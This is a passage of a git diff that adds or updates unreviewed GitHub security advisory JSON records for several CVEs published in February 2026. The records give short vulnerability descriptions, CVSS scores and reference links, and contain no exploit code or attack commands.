"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2622" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/AXa1dpliBomr2Ox6dYJc6jJInEb" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751987" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json b/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json new file mode 100644 index 0000000000000..b0fa0302552e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm7g-73m3-759p/GHSA-rm7g-73m3-759p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm7g-73m3-759p", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68564" + ], + "details": "Missing Authorization vulnerability in sendy Sendy sendy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sendy: from n/a through <= 3.4.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68564" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/sendy/vulnerability/wordpress-sendy-plugin-3-2-7-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json b/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json new file mode 100644 index 0000000000000..e70e23ced3756 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm9x-gmj8-vfxh", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2932" + ], + "details": "A security flaw has been discovered in YiFang CMS up to 2.0.5. The impacted element is the function update of the file app/db/admin/D_adPosition.php of the component Extended Management Module. Performing a manipulation of the argument name/index results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2932" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/2" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347278" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347278" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755281" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755286" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T08:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json b/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json new file mode 100644 index 0000000000000..4c35f4822bb33 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rmj8-x3h3-24rh/GHSA-rmj8-x3h3-24rh.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmj8-x3h3-24rh", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69310" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Woodly Core woodly-core allows Blind SQL Injection.This issue affects Woodly Core: from n/a through <= 1.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69310" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woodly-core/vulnerability/wordpress-woodly-core-plugin-1-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json new file mode 100644 index 0000000000000..402424f7c9e0e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rp93-gq4p-8r62", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26724" + ], + "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the selectgroup and gn parameters on the /?Function=Groups endpoint.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26724" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26724" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rpjf-2xrw-h2w5/GHSA-rpjf-2xrw-h2w5.json b/advisories/unreviewed/2026/02/GHSA-rpjf-2xrw-h2w5/GHSA-rpjf-2xrw-h2w5.json new file mode 100644 index 0000000000000..ec5ebbaaf64ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rpjf-2xrw-h2w5/GHSA-rpjf-2xrw-h2w5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpjf-2xrw-h2w5", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-71241" + ], + "details": "SPIP before 4.3.6, 4.2.17, and 4.1.20 allows Cross-Site Scripting (XSS) in the private area. The content of the error message displayed by the 'transmettre' API is not properly sanitized, allowing an attacker to inject malicious scripts. This vulnerability is mitigated by the SPIP security screen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71241" + }, + { + "type": "WEB", + "url": "https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-3-6-SPIP-4-2-17-SPIP-4-1-20.html" + }, + { + "type": "WEB", + "url": "https://git.spip.net/spip/spip" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spip-cross-site-scripting-in-private-area" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T16:27:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rpq9-4jjf-2xhh/GHSA-rpq9-4jjf-2xhh.json b/advisories/unreviewed/2026/02/GHSA-rpq9-4jjf-2xhh/GHSA-rpq9-4jjf-2xhh.json new file mode 100644 index 0000000000000..fa4dee9cc9def --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rpq9-4jjf-2xhh/GHSA-rpq9-4jjf-2xhh.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpq9-4jjf-2xhh", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2026-27176" + ], + "details": "MajorDoMo (aka Major Domestic Module) contains a reflected cross-site scripting (XSS) vulnerability in command.php. The $qry parameter is rendered directly into the HTML page without sanitization via htmlspecialchars(), both in an input field value attribute and in a paragraph element. An attacker can inject arbitrary JavaScript by crafting a URL with malicious content in the qry parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27176" + }, + { + "type": "WEB", + "url": "https://github.com/sergejey/majordomo/pull/1177" + }, + { + "type": "WEB", + "url": "https://chocapikk.com/posts/2026/majordomo-revisited" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/majordomo-reflected-cross-site-scripting-in-commandphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rqh7-4vgv-648p/GHSA-rqh7-4vgv-648p.json b/advisories/unreviewed/2026/02/GHSA-rqh7-4vgv-648p/GHSA-rqh7-4vgv-648p.json new file mode 100644 index 0000000000000..749b3d28601b8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rqh7-4vgv-648p/GHSA-rqh7-4vgv-648p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqh7-4vgv-648p", + "modified": "2026-02-17T00:30:18Z", + "published": "2026-02-17T00:30:18Z", + "aliases": [ + "CVE-2025-12062" + ], + "details": "The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .html files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .html file types can be uploaded and included.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12062" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3405282" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/815e5b86-2d1b-4794-b761-dad770393d3e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json b/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json new file mode 100644 index 0000000000000..fb0bbd45281e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr5c-93pp-mqfv/GHSA-rr5c-93pp-mqfv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr5c-93pp-mqfv", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67996" + ], + "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Nestin nestin allows Object Injection.This issue affects Nestin: from n/a through < 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67996" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/nestin/vulnerability/wordpress-nestin-theme-1-2-6-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json b/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json new file mode 100644 index 0000000000000..445ebb98c7a24 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr5p-xfmq-r2vx/GHSA-rr5p-xfmq-r2vx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr5p-xfmq-r2vx", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26101" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26101" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26101" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rrcr-4pq7-hrcc/GHSA-rrcr-4pq7-hrcc.json b/advisories/unreviewed/2026/02/GHSA-rrcr-4pq7-hrcc/GHSA-rrcr-4pq7-hrcc.json new file mode 100644 index 0000000000000..f634cf522ac90 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rrcr-4pq7-hrcc/GHSA-rrcr-4pq7-hrcc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrcr-4pq7-hrcc", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23610" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the POP2Exchange configuration endpoint. An authenticated user can supply HTML/JavaScript in the POP3 server login field within the JSON \\\"popServers\\\" payload to /MailEssentials/pages/MailSecurity/POP2Exchange.aspx/Save, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23610" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-pop2exchange-pop3-server-login-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json b/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json new file mode 100644 index 0000000000000..a8fbbf99315da --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rrpc-76pm-5w54/GHSA-rrpc-76pm-5w54.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrpc-76pm-5w54", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69373" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in beeteam368 VidoRev vidorev allows PHP Local File Inclusion.This issue affects VidoRev: from n/a through <= 2.9.9.9.9.9.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69373" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/vidorev/vulnerability/wordpress-vidorev-theme-2-9-9-9-9-9-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json new file mode 100644 index 0000000000000..497b1d0b4d452 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv4c-25xc-4f6g", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68848" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anmari amr cron manager amr-cron-manager allows Reflected XSS.This issue affects amr cron manager: from n/a through <= 2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68848" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/amr-cron-manager/vulnerability/wordpress-amr-cron-manager-plugin-2-3-reflecte-dcross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json new file mode 100644 index 0000000000000..da27a8ec09d4a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv75-v2gv-p54c", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33239" + ], + "details": "NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33239" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33239" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json b/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json new file mode 100644 index 0000000000000..69901b8ba53d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rvcv-xmp5-qv44/GHSA-rvcv-xmp5-qv44.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rvcv-xmp5-qv44", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69401" + ], + "details": "Authentication Bypass by Spoofing vulnerability in mdalabar WooODT Lite byconsole-woo-order-delivery-time allows Identity Spoofing.This issue affects WooODT Lite: from n/a through <= 2.5.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69401" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/byconsole-woo-order-delivery-time/vulnerability/wordpress-wooodt-lite-plugin-2-5-2-payment-bypass-vulnerability-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json index 819900c824fed..d660ca2f4621d 100644 --- a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json +++ b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rvhp-mghq-8mvw", - "modified": "2026-02-14T00:32:42Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70957" ], "details": "A Denial of Service (DoS) vulnerability was discovered in the TON Lite Server before v2024.09. The vulnerability arises from the handling of external arguments passed to locally executed \"get methods.\" An attacker can inject a constructed Continuation object (an internal TVM type) that is normally restricted within the VM. When the TVM executes this malicious continuation, it consumes excessive CPU resources while accruing disproportionately low virtual gas costs. This \"free\" computation allows an attacker to monopolize the Lite Server's processing power, significantly reducing its throughput and causing a denial of service for legitimate users acting through the gateway.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T22:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json b/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json new file mode 100644 index 0000000000000..bffeaa2077aab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw2x-9m7j-wvrx/GHSA-rw2x-9m7j-wvrx.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw2x-9m7j-wvrx", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69383" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Agence web Eoxia - Montpellier WP shop wpshop allows PHP Local File Inclusion.This issue affects WP shop: from n/a through <= 2.6.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69383" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wpshop/vulnerability/wordpress-wp-shop-plugin-2-6-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json new file mode 100644 index 0000000000000..f4067b6fd2983 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw5q-r997-qm48", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69389" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hugh Mungus Visitor Maps Extended Referer Field visitor-maps-extended-referer-field allows Reflected XSS.This issue affects Visitor Maps Extended Referer Field: from n/a through <= 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69389" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/visitor-maps-extended-referer-field/vulnerability/wordpress-visitor-maps-extended-referer-field-plugin-1-2-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json new file mode 100644 index 0000000000000..7b4e0d6fbabbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw72-9mv7-cr6q", + "modified": "2026-02-20T18:31:27Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25343" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS wp-sms allows DOM-Based XSS.This issue affects WP SMS: from n/a through <= 7.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25343" + }, + { + "type": "WEB", + "url": 